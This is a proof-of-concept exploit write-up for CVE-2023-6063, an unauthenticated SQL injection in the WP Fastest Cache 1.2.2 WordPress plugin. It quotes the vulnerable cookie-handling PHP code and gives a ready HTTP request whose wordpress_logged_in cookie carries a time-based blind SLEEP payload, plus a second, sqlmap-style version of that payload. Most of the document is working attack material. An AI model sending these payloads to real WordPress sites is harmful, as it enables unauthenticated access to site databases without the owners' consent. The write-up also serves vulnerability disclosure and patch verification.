WordPress WP Fastest Cache 1.2.2 SQL Injection

`# Exploit Title: Unauthenticated SQL Injection in WP Fastest Cache 1.2.2  
# Date: 14.11.2023  
# Exploit Author: Meryem Taşkın  
# Vendor Homepage: https://www.wpfastestcache.com/  
# Software Link: https://wordpress.org/plugins/wp-fastest-cache/  
# Version: WP Fastest Cache 1.2.2  
# Tested on: WP Fastest Cache 1.2.2  
# CVE: CVE-2023-6063  
  
## Description  
An SQL injection vulnerability exists in version 1.2.2 of the WP Fastest Cache plugin, allowing an attacker to trigger SQL queries on the system without authentication.  
  
## Vuln Code  
  
public function is_user_admin(){  
global $wpdb;  
foreach ((array)$_COOKIE as $cookie_key => $cookie_value){  
if(preg_match("/wordpress_logged_in/i", $cookie_key)){   
$username = preg_replace("/^([^\|]+)\|.+/", "$1", $cookie_value);   
break;  
}  
}  
if(isset($username) && $username){   
$res = $wpdb->get_var("SELECT `$wpdb->users`.`ID`, `$wpdb->users`.`user_login`, `$wpdb->usermeta`.`meta_key`, `$wpdb->usermeta`.`meta_value`  
FROM `$wpdb->users`  
INNER JOIN `$wpdb->usermeta`  
ON `$wpdb->users`.`user_login` = \"$username\" AND # $username varible is not escaped vulnerable to SQL injection  
.....  
  
## Exploit  
GET / HTTP/1.1  
Cookie: wordpress_logged_in_1=%22%20AND%20%28SELECT%201%20FROM%20%28SELECT%28SLEEP%285%29%29A%29%20AND%20%221%22%3D%221  
Host: meryem.local  
  
## Parameter: Cookie #1* ((custom) HEADER)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: wordpress_logged_in_dsadasdasd=" AND (SELECT 3809 FROM (SELECT(SLEEP(5)))RDVP) AND "HQDg"="HQDg  
---  
  
## References  
- [WPScan Blog Post](https://wpscan.com/blog/unauthenticated-sql-injection-vulnerability-addressed-in-wp-fastest-cache-1-2-2/)  
- [WPScan Vulnerability](https://wpscan.com/vulnerability/30a74105-8ade-4198-abe2-1c6f2967443e/)  
- [CVE-2023-6063](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6063)  
  
## Credits  
- Original Researcher: Alex Sanford  
- PoC: Meryem Taşkın  
  
`